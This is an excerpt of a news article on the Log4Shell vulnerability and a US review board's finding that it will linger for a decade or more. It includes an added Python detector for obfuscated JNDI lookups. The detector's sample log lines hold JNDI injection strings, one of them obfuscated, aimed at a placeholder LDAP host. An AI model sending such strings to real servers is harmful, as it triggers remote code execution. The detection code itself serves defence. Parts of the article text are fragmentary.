
8 months on, US says Log4Shell will be around for “a decade or longer”
2022-07-18 18:57

Unless you had read the manual really carefully, and taken additional precautions yourself by adding a layer of your own security on top of Log4j, your software could come unstuck.

INPUT                         OUTCOME
-----------------             ----------------------
CURRENT=$ /$              ->  CURRENT=Java version 17.0.1/Windows 10 10.0
Server account is: $      ->  Server account is: root
$                         ->  SECRETDATAINTENDEDTOBEINMEMORYONLY.

Clearly, if you're accepting logging text from a trusted source, where it's reasonable to allow the loggee to control the logger by telling it to substitute plain text with chosen internal data, this sort of text rewriting is useful.

Even worse, the LDAP server could return precompiled Java code for generating the data to be logged, and your server would dutifully run that program - an unknown program, supplied by an untrusted server, chosen by an untrusted user.
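Because Log4j resolves nested lookups from the inside out, a detector that only greps for the literal text "${jndi:" misses a lookup assembled from inner ones. The following is an added example, not code from the article or from Log4j: it unwraps the text-only lookups (lower, upper, and the ":-default" fallback) before checking which lookup prefixes remain, and runs over constructed sample log lines that use an assumed placeholder hostname.

```python
import re

# Constructed sample log lines (not from the article). The third line
# spells the lookup out of nested case-conversion lookups.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login" 200 "${jndi:ldap://placeholder.example/a}"',
    '10.0.0.7 - - "GET /api" 500 "${${lower:J}ndi:${lower:LDAP}://placeholder.example/b}"',
]

# Matches an innermost lookup: no further "${" or "}" inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(body: str) -> str:
    """Emulate only the lookups that rewrite text; anything else is kept."""
    key, sep, default = body.partition(":-")
    if sep:                       # ${lookup:-default} falls back to the literal default
        return default
    prefix, _, arg = body.partition(":")
    if prefix.lower() == "lower":
        return arg.lower()
    if prefix.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"      # unresolvable here: leave it for reporting


def normalize(text: str, max_passes: int = 10) -> str:
    """Repeatedly collapse innermost text lookups until nothing changes."""
    for _ in range(max_passes):
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def lookup_prefixes(line: str) -> list:
    """Lowercased prefixes (e.g. 'jndi', 'env') of lookups left after unwrapping."""
    return [m.group(1).partition(":")[0].lower()
            for m in _INNER.finditer(normalize(line))]


def is_jndi_lookup(line: str) -> bool:
    return "jndi" in lookup_prefixes(line)


def scan(lines):
    """Return the lines that still carry a JNDI lookup once unwrapped."""
    return [line for line in lines if is_jndi_lookup(line)]
```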

Loosely speaking, if any server, anywhere in your network, logged untrusted input that had come in from outside, and used Log4j to do so.

Any back-end server that received and logged data from elsewhere on your network, that was written in Java, and that used the Log4j library.

The [CSRB] assesses that Log4j is an "Endemic vulnerability" and that vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer.


News URL

https://nakedsecurity.sophos.com/2022/07/18/8-months-on-us-says-log4shell-will-be-around-for-a-decade-or-longer/